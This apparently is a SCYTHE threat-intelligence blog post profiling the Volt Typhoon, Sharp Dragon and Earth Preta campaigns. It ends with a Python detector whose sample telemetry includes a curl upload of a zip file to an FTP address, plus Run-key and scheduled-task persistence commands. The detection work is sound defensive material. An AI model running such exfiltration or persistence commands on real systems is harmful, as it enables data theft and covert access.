The cybersecurity landscape continues to evolve, with threat actors targeting critical infrastructure, government entities, and industries worldwide. SCYTHE’s emulation and analysis of these threats provide invaluable insights to strengthen defenses. Below, we highlight some of the most pressing threats we’ve tackled this year, detailing their tactics, the industries impacted, and the regions they target.
Volt Typhoon represents a significant threat, as identified by the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI). These attacks are attributed to state-sponsored cyber actors from the People's Republic of China (PRC). Volt Typhoon’s campaign focuses on infiltrating IT networks to pre-position malicious actors, intending to disrupt or potentially destroy critical infrastructure, a strategy aligned with geopolitical tensions or military conflicts.
Key Tactics:
‣ Living off the land binaries and scripts (LOLBAS) to avoid detection
‣ Exploiting valid accounts for persistence
‣ Maintaining long-term intrusions, some undetected for over five years
Targeted Industries:
‣ Energy
‣ Communications
‣ Transportation Systems
‣ Water and Wastewater Systems
Targeted Regions/Countries:
‣ United States
‣ Australia
‣ Canada
‣ Guam
‣ New Zealand
By emulating these tactics, SCYTHE equips organizations to identify vulnerabilities and mitigate risks posed by such advanced campaigns.
Sharp Dragon, a Chinese threat actor, primarily targets government entities to gain initial access and facilitate lateral movement. By compromising trusted organizations, Sharp Dragon amplifies its impact, infiltrating systems across multiple regions.
Key Tactics:
‣ Exploiting trust in compromised governmental networks
‣ Lateral movement to extend access
‣ Sophisticated phishing campaigns
Targeted Industries:
‣ Government
Targeted Regions/Countries:
‣ Southeast Asia
‣ Africa
‣ Caribbean
SCYTHE’s simulations of Sharp Dragon’s tactics emphasize the importance of securing inter-organizational trust relationships and monitoring for subtle anomalies in system behavior.
Earth Preta (also known as Mustang Panda or Stately Taurus) continues to refine its techniques, targeting educational, research, and governmental institutions. This group focuses on the Pacific region, employing novel tools, upgraded malware, and creative attack vectors.
Key Tactics:
‣ Removable USB devices, such as BadUSB drives or a Flipper Zero, for initial access
‣ Persistence through registry modifications, Run keys, and scheduled tasks
‣ Exfiltration via FTP using curl
‣ Deployment of custom DLLs for command-and-control (C2) communication
Targeted Industries:
‣ Government
‣ Non-Profits
‣ Religious Organizations
Targeted Regions/Countries:
‣ Japan
‣ Australia
‣ Myanmar
‣ Mongolia
‣ Vietnam
‣ Pakistan
‣ United States
SCYTHE’s emulation campaigns model these behaviors to help organizations bolster defenses against emerging tactics.
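As an added example (not SCYTHE's code or tooling), the following Python checks endpoint telemetry for three of the Earth Preta behaviors listed above: a curl upload to an ftp:// destination, a Run key being set, and a scheduled task being created. The event records, paths, and addresses are constructed for illustration, not taken from a real intrusion.

```python
import re

# Constructed sample telemetry: one dict per endpoint event, shaped loosely
# like process-creation and registry-set records from an EDR or Sysmon.
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -T C:\\Users\\a\\docs.zip ftp://198.51.100.7/up/ --user u:p"},
    {"type": "process", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe https://example.invalid/update.json -o update.json"},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "Updater", "data": "C:\\Users\\a\\AppData\\Roaming\\svc.exe"},
    {"type": "process", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /tn Sync /tr C:\\Users\\a\\AppData\\Roaming\\svc.exe /sc onlogon"},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer",
     "value": "ShellState", "data": "..."},
]

# Matches the per-user and per-machine Run / RunOnce autostart keys.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.IGNORECASE)


def curl_ftp_upload(cmdline):
    """True when a curl command line both targets ftp(s):// and uploads a file.

    Uploads use -T / --upload-file, so plain downloads over FTP are ignored;
    that keeps the rule focused on the exfiltration pattern, not FTP in general.
    """
    args = cmdline.split()
    has_ftp = any(a.lower().startswith(("ftp://", "ftps://")) for a in args)
    uploads = any(a in ("-T", "--upload-file") or a.startswith("--upload-file=") for a in args)
    return has_ftp and uploads


def detect(events):
    """Return (rule_name, detail) alerts for the tactics covered by this example."""
    alerts = []
    for e in events:
        if e["type"] == "process":
            name = e["image"].lower().rsplit("\\", 1)[-1]
            cmd = e["cmdline"]
            if name == "curl.exe" and curl_ftp_upload(cmd):
                alerts.append(("curl_ftp_upload", cmd))
            elif name == "schtasks.exe" and "/create" in cmd.lower():
                alerts.append(("schtasks_create", cmd))
        elif e["type"] == "registry" and RUN_KEY_RE.search(e["key"]):
            alerts.append(("run_key_set", f'{e["key"]}\\{e["value"]} = {e["data"]}'))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

In production these rules would be tuned against a baseline of legitimate curl and schtasks usage; the point here is that each listed tactic maps to a concrete, testable telemetry condition.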
Threat actors like Volt Typhoon, Sharp Dragon, and Earth Preta highlight the evolving risks faced by critical infrastructure and industries worldwide. By analyzing and emulating these campaigns, SCYTHE empowers organizations to prepare for the threats of tomorrow. Stay tuned for our upcoming Threat Thursday Live sessions, where we’ll dive deeper into emerging risks and the strategies needed to counter them.